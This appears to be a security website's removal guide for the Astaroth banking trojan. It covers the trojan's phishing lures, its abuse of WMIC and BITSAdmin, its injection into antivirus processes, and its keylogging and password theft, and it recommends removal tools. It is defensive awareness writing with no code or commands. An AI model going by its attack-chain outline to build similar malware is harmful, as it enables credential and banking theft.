Astaroth trojan - How to remove

Astaroth is the name of a dangerous trojan, that was first discovered in 2017. Very recently a new strain of this malware was caught spreading in South America (Brazil specifically) and Europe exploiting antivirus software and stealing important banking information. Undoubtedly, the new Astaroth trojan is something that all users globally should be aware of because the improved obfuscation techniques and malicious exploitation of the Most popular anti-malware program Avast can lead to serious issues like emptied bank accounts, hacked profiles, infections with more malware and data breach.

Malware infections this past year have been Increasing significantly, but that’s not only because of the released quantity but rather hackers’ discoveries on how to misuse more legitimate software features and improve obfuscation methods. In this case, the abused antivirus processes are the reason why Avast have had issues detecting the new Astaroth trojan strain at the beginning. Although it isn’t easy to detect and remove the threat from one’s own Dynamic Link Library, which contains trusted binary modules to run the antivirus in the first place, Avast addressed the issue and said that their binaries have self-protected mechanisms and the detection of the new Astaroth malware is now possible.

If you are using an older Avast version, or don’t have an anti-spyware program at all, we suggest continuing with this article and finding out more about Astaroth trojan. Because of its cunning nature, even antivirus programs have issues detecting this threat, therefore knowing the ways it spreads and the typical behaviour, allows you to recognize the potential danger yourself, and even help you prevent the further invasion.

What is Astaroth trojan

Astaroth (another name for ‘Great Duke of Hell’) is a type of malware that aims to steal sensitive data by logging keystrokes, reading information copied on the clipboard, delivering other malware and, overall, silently benefiting from the user (or corporation) and its computer. Previously discovered by Cofense, the new variant of Astaroth trojan seems now not only abusing the trusted Windows processes to succeed in its dubious acts but also exploiting security software tools to enhance the power. Additionally, this strain uses the new ‘fromCharCode()’ deobfuscation method, which allows malware not to be detected during initiation period.

Astaroth trojan attacks utilizing malicious binary modules and abusing tools like BITSAdmin and the WMIC utility (LOLbins) in order to interact with C2 servers. As the researchers of Cybereason.com reported, this allows Astaroth to successfully infect Windows and log keystrokes, intercept with OS calls and reveal vast amounts of the sensitive data user enters through the compromised machine when connecting to bank and business accounts. On top of that, together with NetPass, a trojan is able to gather information like passwords of mail accounts, messengers, Internet Explorer and etc., and not just from one computer, but every device remotely connected to the same network.

While Trojans are known for this type of behaviour, e.g. CamuBot Trojan, JS.Downloader, vbs:malware-gen and etc., cybersecurity experts are assuming that this new technique, that Astaroth malware presented (using LOLbins and exploiting antivirus programs), is going to be soon widely adopted by many other hackers, which will make detection much harder. That is why, when crooks are working on obfuscation and enhancing maliciousness of their viruses, make sure to brush up on your Safe online browsing skills.

How does Astaroth virus spread

At the moment, it is known that Astaroth trojan spreads via phishing emails either as Fake invoices or Brazilian presidential election research poll. These messages are well socially engineered to appear like they are coming from the respected institutions, therefore it tricks so many users. The invoice email proliferates Astaroth malware very similarly to how ransomware is distributed, there is a short message claiming that there is a payment due and to review more information you must open a sent zip file, which is actually the installer of the trojan. As for the presidential poll, users are encouraged to pick one of the offered Brazilian candidates (either Haddad or Bolsonaro) and secure their opinion by clicking on the buttons, which end up leading to the malicious link. (More about the attack on Cofense.com)

According to the Bleepingcomputer.com, once the user clicks on the link or opens downloaded zip file, the inside .lnk file is released and it initiates wmic.exe process. That results in XSL Script Processing attack via C2 servers. Astaroth trojan connects to hackers’ servers and delivers them the data about the compromised system, then after the XLS script is downloaded to the infected computer, malware again connects to another command-and-control server and by using BITSAdmin gets a payload with multiple Astaroth modules, camouflaged as .jpeg, .gif or a file without any extension, in order not to be detected. Malicious modules are then injected into aswrundll.exe Avast antivirus DLL or unins000.exe process of another security product of GAS Tecnologia. This allows Astaroth trojan to be undetected by antivirus and monitor clipboard, log keystrokes, load additional modules, collect data about the machine and steal the information.

How to get rid of Astaroth trojan

Astaroth virus uses great obfuscation skills and doesn’t have a graphical user interface (GUI), which would allow victims to easily uninstall it, there is no other way to delete Astaroth trojan, other than using a special anti-malware program like Spyhunter or Malwarebytes. These programs possess skills that are necessary for this situation, meaning that the trojan can be detected and removed without any problems. Additionally, this automatic elimination doesn’t require you spending hours of your time because the software does everything for you. In case you are unable to download security tools, please try downloading the programs on a clean computer and transferring them to the compromised one through USB hard drive or etc.